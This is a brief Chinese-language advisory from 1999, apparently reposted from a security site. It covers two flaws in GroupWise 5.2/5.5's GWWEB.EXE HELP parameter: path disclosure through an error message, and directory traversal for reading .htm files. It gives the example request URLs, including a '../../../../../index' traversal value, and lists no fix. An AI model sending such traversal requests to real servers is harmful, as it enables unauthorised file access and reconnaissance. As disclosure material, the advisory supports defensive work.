发布日期：1999-12-21
更新日期：1999-12-21

受影响系统：

GroupWise 5.2 and 5.5

描述：

---

一、GWWEB.EXE的help参数暴露服务器的web路径；
二、利用GWWEB.EXE和HELP参数，任何人都可以读取.htm文件。


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

检验程序:

一、web服务器全路径
   发出： http://server/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
  
   这个服务器将回答：
   Could not find file SYS:WEB\CGI-BIN\GW5\US\HTML3\HELP\BAD-REQUEST.HTM
  
二、读取.htm文件
  
   发出 http://server/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index   
   (参照上个例子返回的路径），可以看到主web站点页面.


建议：

---

暂无

浏览次数：7809
严重程度：0（网友投票）